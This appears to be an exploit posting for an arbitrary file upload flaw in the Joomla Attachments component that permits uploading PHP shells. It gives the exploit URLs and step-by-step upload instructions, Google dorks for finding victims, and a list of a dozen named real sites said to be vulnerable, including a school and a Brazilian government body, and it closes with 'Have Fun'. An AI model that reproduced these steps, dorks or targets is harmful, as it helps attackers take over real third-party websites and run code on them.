#################################################################### # Exploit Title : Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 26/05/2019 # Vendor Homepage : jmcameron.net # Software Download Links : jmcameron.net/attachments/ jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip joomlacode.org/gf/project/attachments/frs/ github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/ # Software Information Links : extensions.joomla.org/extension/attachments/ joomlacode.org/gf/project/attachments/ joomlacode.org/gf/project/attachments3/ # Joomla Affected Versions : Joomla 3.4.8 Joomla 3.5.1 Joomla 3.6.5 Joomla 3.8.1 Joomla 3.8.11 Joomla 3.8.3 Joomla 3.9.6 # Software Affected Versions [ Component Com_Attachments ] : 2.2.2 and 3.2.6 - 3.x / All previous versions. # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:/index.php?option=com_attachments&task=upload intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved. intext:Treadmill Desk from TrekDesk intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla intext:Fundación Jesuitas Paraguay intext:© 2019 Mars Society Polska intext:Designed by atict.com intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com intext:Designed by Burosphere. intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional and more on Google and other Search Engines...... Have Fun.... # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt #################################################################### # Description about Software : *************************** The 'Attachments' extension allows files to be uploaded and attached to content articles in Joomla. Includes a plugin to display attachments and a component for uploading and managing attachments. #################################################################### # Impact : *********** Joomla Attachments Components 3.x and other previous versions could allow a remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation of file extensions by the multiple scripts to index.php. The issue occurs because the application fails to adequately sanitize user-supplied input. Exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. #################################################################### # Arbitrary File Upload/Unauthorized File Insertion Exploit : **************************************************** /index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public " Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system. # Directory File Path : ******************** /attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt #################################################################### # Example Vulnerable Sites : ************************** [+] arpadter.reformatus.hu/index.php?option=com_attachments&task=upload&uri=file&parent_id=87&parent_type=com_content&tmpl=component&from=closeme [+] troop444.ebbids.com/index.php?option=com_attachments&task=upload&uri=file&parent_id=104&parent_type=com_content&tmpl=component&from=closeme [+] trekdesk.com/index.php?option=com_attachments&task=upload&uri=file&parent_id=11&parent_type=com_content&tmpl=component&from=closeme [+] xn--h1arefj.xn--p1ai/index.php?option=com_attachments&task=upload&uri=file&parent_id=8&parent_type=com_content&tmpl=component&from=closeme [+] ashleighd.co.za/index.php?option=com_attachments&task=upload&uri=file&parent_id=165&parent_type=com_content&tmpl=component&from=closeme [+] fundacionjesuitas.org.py/fundacionjesuitas/index.php?option=com_attachments&task=upload&uri=file&parent_id=41&parent_type=com_content&tmpl=component&from=closeme [+] cosmosdawn.net/index.php?option=com_attachments&task=upload&uri=file&parent_id=21&parent_type=com_content&tmpl=component&from=closeme [+] marssociety.pl/index.php?option=com_attachments&task=upload&uri=file&parent_id=5&parent_type=com_content&tmpl=component&from=closeme [+] grundschule-caeciliengroden.de/index.php?option=com_attachments&task=upload&uri=file&parent_id=7&parent_type=com_content&tmpl=component&from=closeme [+] biotecroma.it/index.php?option=com_attachments&task=upload&uri=file&parent_id=73&parent_type=com_content&tmpl=component&from=closeme [+] commune-ploudaniel.fr/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme [+] cnrh.gov.br/index.php?option=com_attachments&task=upload&uri=file&parent_id=89&parent_type=com_content&tmpl=component&from=closeme #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################